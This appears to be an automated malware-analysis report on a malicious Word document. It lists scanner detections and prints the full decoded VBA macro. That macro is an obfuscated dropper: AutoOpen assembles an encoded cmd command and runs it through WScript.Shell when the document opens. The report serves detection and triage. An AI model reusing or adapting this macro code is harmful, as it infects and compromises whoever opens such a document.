MALICIOUS
310
Risk Score
Heuristics 10
-
ClamAV: Doc.Dropper.Valyria-6665595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6665595-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
NtLmiKwO = CreateObject("WScript.Shell") _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
NtLmiKwO = CreateObject("WScript.Shell") _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10584 bytes |
SHA-256: 0eee9c760f8f49623ff34a60a6db5dfd8c7d617e0b6879626e1cf64fc24c4636 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
144 of 226 identifiers look randomly generated (e.g. 'znLKzJzoudlYA'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "znLKzJzoudlYA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ApWzUKnRosNSQ"
Function AAQTwY()
On Error Resume Next
Error TsBOk * PzbIr / EGIrlR * tBdawp
Error 80496 * XVtGNU / GJcGUz / ibFhc
Error cdirr / ApSFY * Jcsqw * cVpkE
Error mGlMo / iRXmB * KVjkTi / 41263
azsTMArRGVs = "Md /V^" + " " + "^ " + "^" + " /" + "c " + " " + Chr(0 + 2 + 1 + 4 + 27) + " ^se^t"
Error 86001 * uXftQL
Error 65237 / 51968 * vRDLS / MCftpY
Error YnNiX / fbfhw
Error 48347 * BOrfwL * 84365 / lCSPk
iPhLN = " ^ ^ ^" + " ^6^bv" + "=AACA^g" + "^A^A" + "IAAC^" + "A^gA^"
Error CnWmM * zdJdWH
Error 49727 * KwZVd
TqkZmJPM = "A^" + "I^A^AC^" + "A^g^AA" + "^I^" + "A^A" + "CA^" + "g^" + "A^" + "AI^A^A"
Error wAFiQf * BqYLln * 4118 * sPcUD
Error IXMki / hjHdFJ * 78225 * IFmzEB
TcNlBV = "CA^g^AA" + "^IA" + "ACA^gA^" + "Qf^A" + "0H^A7^B" + "AaA^M^" + "G^A0" + "^B^QY^" + "AMG" + "A" + "9^B^wOA"
Error AMbLf * UBoFn
Error DwGwti / hUhntR
Error 13147 * IrBXkJ
HKPspJlirRN = "s^" + "G^AhB" + "QZ^AIHA" + "^" + "i^Bw^OA" + "^M"
Error zMPHSO / VaqFs
Error qaVcff / SOavXR
Error 58038 * RhbBl
Error FvRXf * hTUOGX * TbTjj * 93335
jCjmN = "F^AuB" + "^g^" + "YA^" + "QC^A^" + "g^" + "A^Qb^" + "A^" + "UGA^0B^" + "Q" + "^S^A^0" + "C^" + "A" + "^lB"
Error nUPbIH / OZHWz
Error 13590 / 28029
Error YGvni * oMuwWP
Error jiHTJ / BwhfM
Error 40892 / zzWLc
lPzsiUdjqEQ = "^w" + "^aA^8" + "GA2^B^g" + "^bA" + "^" + "k" + "EA7A" + "^QKA" + "^" + "M"
Error zGbKQV / csXGZ
Error 87085 / PHUAFb * 4769 / ztAtM
Error 36167 / FKjnQf
Error dKDTwP / 87355 / MQRjw / 59626
Error 78720 / pYzJNh
bskdYj = "F^A" + "^uBg^YA" + "QCAg" + "A^AL" + "A0E^A" + "vB^Q" + "W^AQC" + "AoA^QZA" + "^w^GA^" + "p^B^"
Error QjXvXi / kzihv
Error lbRPcK * DvQAjj
LzahjSi = "g" + "R^A^Q" + "G^Ah^B" + "wbAwG^A" + "u^" + "B^wdA8" + "G^AEB" + "g^LAo^"
Error 60966 * 19933 * qOcFY / 41213
NYAswfQFLbJ = "G^A^U" + "^BQ^WA" + "QC^A^7^" + "BQ^" + "eAIHA" + "^" + "0Bw^eA" + "^kC" + "^AM" + "BgQ" + "^AM^E^A" + "^kA^A^I" + "A^4^"
AAQTwY = azsTMArRGVs + iPhLN + TqkZmJPM + TcNlBV + HKPspJlirRN + jCjmN + lPzsiUdjqEQ + bskdYj + LzahjSi + NYAswfQFLbJ
Error 24984 * rRluP * uPGhpV * csNWw
Error XlHpE * isSCK / BQOGk / kWWls
Error QBwsp * kiPMHJ
End Function
Function nkWaqCkJW()
On Error Resume Next
Error 30627 / 23549 * vltwpz / 58476
Error TRzrF / IwoQfR
Error jGXzl / QvpFK / pEFBwD * hUnNl
sDmuNHIlkD = "GA^p^B" + "^AI^A" + "0^E" + "AvBQW^A" + "QC^Ao" + "^AAaA" + "^M" + "G^A^h"
Error apOMFp / zjdbzE / 15638 * Llfiz
Error VGXvhi / GknLC * 26645 * YjnzhW
Error 78341 * SmtsmV * AVzDM / GrZhj
nzHbKrHiLqL = "^BQZ" + "^A^I" + "HAvBgZ^" + "A^s" + "^DAnA" + "QZ" + "AgHAl" + "B^gLAcC" + "^Ar^Ag^" + "W^" + "Ak^"
Error 46393 / IGjjo
KVZpGBEDc = "F^A" + "^i^B^" + "AJ^AsC" + "^A" + "n^" + "A"
Error 32301 * cdiRna * sRipjN * IQrdpb
Error 88762 / kTGMpt
Error pdUIoJ / FZatn / 72944 / utmEr
Error MOPBq * 49662
TAvChlzrOmB = "^AX" + "AcC^" + "ArAwY^" + "A^" + "kG" + "A^s" + "B" + "^g^YAU^" + "HAwB^gO" + "A^Y"
Error lWMNv * ihfzzh * KzhXd * wiSqU
Error 63377 * hILzF
sKhNblmb = "H" + "A^u^" + "BQZA^QC" + "A^9A" + "wU" + "A^4G" + "Ai" + "B" + "AJ^" + "A" + "s" + "^D^AnAA" + "N^AI^D^"
Error npbTj * FmUPwt
Error OlmmO / CDWXw / ZkTKb / oSwib
OiavjV = "A" + "^yAw" + "J^A" + "A" + "C^A9" + "A^AI" + "^Ao^F^A" + "^ZB^g^Y" + "^AQC" + "^" + "A7A^QKA" + "cC^" + "A"
Error Gvjiar * KjzOYY / 71240 * hJmkX
Error 90558 / mttInl / 41436 * cjiorr
Error MGcJb * tNOHO * TqZjJz / abakq
Error iEVXRQ * YGqFSM * 14861 / cMMSvl
XGiIIZ = "^A^B" + "^wJ" + "AgC" + "^A" + "^0^B^Q" + "aA^" + "wG^Aw^" + "Bw^U^A" + "4CAn^" + "AQM"
Error 70985 / UTpcZ
XUiaiIu = "^" + "Ac^H^" + "A0" + "^A^gMAo" + "^FA^" + "H^BgN^"
Error OOHBK / ZOtCDw
Error 39691 / UoqMM / 15239 / GicoWz
Error 84126 * AiEHRa
YKsCf = "A8C^AvB" + "g" + "b^A4CA^" + "z^B" + "wb^A" + "w^G^A" + "lBAaA4" + "CA0^Bw"
nkWaqCkJW = sDmuNHIlkD + nzHbKrHiLqL + KVZpGBEDc + TAvChlzrOmB + sKhNblmb + OiavjV + XGiIIZ + XUiaiIu + YKsCf
Error lkFrvz / NdKjvW / tWrsOF / 2650
Error ClsvGv * IrRjG
Error AlXNP / BDLNzi * zJikWz / vUrAWW
Error fpQoDw * 98003
Error zzYcj / EuOfw / AtwzDZ / uJvNjj
End Function
Function TGYwfRXiBE()
On Error Resume Next
Error 92496 / HhOKYW
Error 3840 / luArSm
Error 58475 / iHufa
BcCJa = "c^" + "AUGA" + "0BwL" + "^" + "A^8" + "C^A^" + "6A^" + "AcA^Q^H" + "^A"
Error 94287 / vKatG
Error 17260 / SnnRN * lWrwA / RWsrQQ
Error 51186 * suoLPD
Error 19923 / zWLXo / 33197 / wmcLS
ARANGbrCiE = "0" + "BA^a^A^" + "A^EA^1" + "^Bw^LA" + "^" + "8G^" + "Aj^B^" + "gL" + "^" + "A^0G" + "A" + "v^" + "Bw^Y"
Error 85374 / YJlct * QzwfNz / 37867
Error 76858 * AculvC * 13974 * sWcMY
SknmGwAZaX = "A4C" + "AuBw" + "bAk" + "G^" + "A^0^B"
Error STwjTc * mLGvjH
Error 15567 * cYqwod
Error 22503 / iKdjLc
Error 41828 / ZjWzD * 48960 * jFVqDz
AwIjbj = "w" + "YA^U^GA" + "^0^BwbA" + "I^H^A" + "^wB^wb^" + "A^kGA" + "2^Bw" + "^"
Error 61894 / cuwFzp / 74399 / zLbGcN
Error aMADYW * CoYEG * 31105 * sdPdw
Error ZJNlkG / 12477
Error jwjAIL / sOmkF
HvRKw = "LA" + "^8C^A6^" + "A^AcAQ" + "H^A" + "^" + "0"
Error RtrciW * 25040 / 46961 * lLkNM
Error Pzbtf / ufomz / EfjRn * rKFhv
jYHPjrPX = "B" + "A^a" + "^" + "A^A^EA0" + "^A^wZ" + "^Aw^E^A" + "vA^Q^b" + "^A^8^G" + "Aj" + "B^" + "gLA"
Error RIBZE / ESSBcP / 29444 / BcINQC
OZthQwavt = "Y" + "H^A^l^" + "BAZ^" + "A^gGA" + "z^" + "B^Qa^A4" + "^G^Av" + "^B"
Error 31256 * csuVha * mRAPnw * MLnKQ
Error 69825 / zCJHE / nqBMsR / MnilrJ
Error 96541 / 28716
HIMdrUv = "^A^d^A4" + "CA^" + "l" + "Bw" + "ZAEG" + "^" + "Aw" + "B^" + "Q" + "^" + "Z^A^0^" + "G^A" + "v^B^Aa"
Error 60768 * AFOsov * 99612 * vsMZW
Error 98497 / wDvfOA / EYYLu * ijubH
Error 66292 * IXwRdR
Error LVPqW * PTAiA
AqupuREt = "^A0C" + "A^4^B^Q" + "YA" + "Q" + "^HA"
Error QjFIM * RzOvQ
cRjNNBOVr = "6B^w" + "^bA^8" + "C^" + "Av^A^g" + "^O" + "^AAH^A" + "0B^A^d"
Error 62363 * 96432
Error idiMDw / nRUbb
Error 94648 * QoHNM / 40289 * mFOHT
FAGWO = "^A" + "^gG^AA" + "BA^T^As" + "G^AyAw^" + "YA^"
TGYwfRXiBE = BcCJa + ARANGbrCiE + SknmGwAZaX + AwIjbj + HvRKw + jYHPjrPX + OZthQwavt + HIMdrUv + AqupuREt + cRjNNBOVr + FAGWO
Error iVmzRD * 54111
End Function
Function CZwToYDn()
On Error Resume Next
Error 75329 * VvopW
Error PjBZkB / iqcwv / dRrlGp * 52389
Error 96081 * jtaKzJ
Error sRUKm * Jkkin
AjWifqfQiS = "I" + "^G^A0A^" + "w" + "^L" + "A"
Error 18551 * KXDED
Error OTRuUf * rPUsM
TWnopnuq = "UHAlBg" + "L" + "^A" + "MH^A^" + "y^B^Q^d" + "A^8^" + "GA^s^" + "B^wb^A" + "MG^Au" + "^B^Q"
Error 16055 / iRbWF
Error 83519 / pWcQmv
lJdHKZbNL = "^ZA^YH" + "^A^lB" + "wcA^4" + "C^Ak^B" + "^A^" + "bA^kG" + "A1B^gY" + "^AE"
Error 62754 / DBtsF
Error tSTUm * mBFZm * NbVcjF / CuETPz
Error aHZmMz * LaYPCT
Error 27268 / WSTTki
hXUQrwsksTw = "G" + "Ay^BQZA" + "QH" + "A" + "v^A"
Error 74118 * bfowD * GIMuf * 74580
Error QPuDQC * 57386
zlNOAfa = "^wLA" + "^oD" + "A^" + "wB^" + "A^d" + "^AQ^HA" + "^" + "oBA^Q^"
Error 44287 * 94885
Error MKsiLz / WRWbU
Error KdTBjs / CUnVwk / 57692 * 28144
Error 85966 / jYFTj
Error BHutw / MUmWH
NXFErTT = "AkH" + "^AvA" + "^Qb" + "A8" + "^" + "GA^j^B^" + "g^LAE^" + "G^A^2" + "^B" + "^Qa^A" + "Q" + "H^A^"
Error 26009 / nKpFM
Error aHSFa / zDMJG
Error 94259 / iCcUl
FQUXDrdZ = "yB" + "w^b^AAH" + "^A^l" + "^B" + "^" + "AZ^AE" + "G^Aw^" + "Bw"
Error 21010 * lwnDHj / 17576 / zFWvz
Error hEHNk * qlPcjI
Error 76265 * XaBGZG
Error qUDvG * aaiVob
IFuapz = "^b^A^" + "I" + "^H" + "^AuBwb^" + "AkGA^" + "o^Bwc^" + "A^EG^" + "A^" + "mB^Q^" + "Y" + "^A^" + "k^GA^t^"
Error EFfIXW * bvdYO
Error 72242 / JMsIL * AAPmn / HRhNou
Error XAfFOk * DizLqG
UsbwCTso = "B^wL^" + "A^8C^" + "A^6A" + "^A" + "cAQ" + "H^A0" + "^B" + "^A^a^A" + "c" + "CA9AAT" + "A^I^E^" + "A^" + "D"
CZwToYDn = AjWifqfQiS + TWnopnuq + lJdHKZbNL + hXUQrwsksTw + zlNOAfa + NXFErTT + FQUXDrdZ + IFuapz + UsbwCTso
Error WANvA / jwjPjq / 43879 * MVcUB
End Function
Function ZAZFaKiQqLI()
On Error Resume Next
Error 80663 / 52489 / 92614 * wNRwBM
Error UijZR / DOPwf
Error PmLfN / vUDiX * 13554 * kwVrM
JFSLiBTWW = "BA^JA" + "s" + "DA^0" + "Bgb^A^U" + "G"
Error HhBqP / FjbHD / lMQvGp * AwkGmN
pVUjzo = "^A" + "pBA^b" + "^" + "A^MEA^" + "iB" + "^Q" + "Z^" + "Ac^F" + "Au^A" + "A^d" + "^A" + "^UGA"
Error 64274 / 9052
mCikrYI = "O^BAIA^" + "Q" + "^HA" + "^" + "jB^Q^Z^" + "AoGA" + "iB^w" + "bA0" + "C^A^3^" + "B^Q^"
Error 38954 * cdPUAw
Error 8101 / iBbGs / 43240 * HhhQlj
Error oDZVc / rzTrp * VdWaO * KBYbVD
TswpwBjJ = "Z^A" + "^4^GA9A" + "^" + "g^aA^Q" + "^F" + "AZ^B^A^" + "J^ ^e^" + "-" + " ^l^l^" + "e" + "^hs"
Error NNDPzG * FXmOjN / 65262 * lYMIw
Error wuYVpt * saloqH / 80473 * oJcNWi
DQTzsvVbI = "rew^o" + "^p& " + " ^f^O" + "r /^L " + "%^w ^i" + "n ( " + "^1" + "^013^ ^" + " ^ -^1" + "^" + " ^ ^ " + "0)^D"
ZAZFaKiQqLI = JFSLiBTWW + pVUjzo + mCikrYI + TswpwBjJ + DQTzsvVbI
Error uzMfN / HntcQ / qiRuH / McrXaf
End Function
Function UkMWDn()
On Error Resume Next
Error jjVCq * IaphSf / dBwfY * ziKSO
kfRnUt = "^O s" + "^e^t ^m" + "^bS=!^" + "m^bS!!^" + "6^bv:~ " + " %^w" + ", 1!" + "&" + "^I^f" + " " + "%^w =="
Error YXZjZd / bDXZa
Error auGjlZ * 41408
Error 66380 / bNoAJ
TfpJmjlLn = " " + "^" + "0 C^" + "A^l" + "L" + " %" + "^m^bS" + ":^*" + "^mbS^" + "!^"
Error iziZpr / FmQaiR * AKNvwZ * tBpIlW
Error wFjDQA * BjCzYF / 96990 / PajEZD
Error NhwLYA * maDJp
Error IiUjQ * 50180 * qiELl * vpREVv
JiKzIjTtOE = "=" + "% " + " " + Chr(0 + 2 + 1 + 4 + 27) + " "
UkMWDn = kfRnUt + TfpJmjlLn + JiKzIjTtOE
Error iTtwuY * rpjzit * oEGYN * 43002
End Function
Attribute VB_Name = "YBEISfwZXXh"
Sub AutoOpen()
On Error Resume Next
Error rONqm * CJQtzO
Error 48152 * NBlXc
Error 21614 * wbHaSs * DfiWX / wlfjDM
NtLmiKwO = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(12 + 4 + 7 + 5 + 39) + OhrOYobRKQ + NukjzBt + AAQTwY + nkWaqCkJW + TGYwfRXiBE + CZwToYDn + ZAZFaKiQqLI + UkMWDn + XINXMRiRpSFu + IvhiVpbowuUMTR, 462569852 - 462569852)
Error ZJiKS * zwNLP * 82992 / 82141
Error 50357 * OhnqYd / LWwAUw * KXvbkQ
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.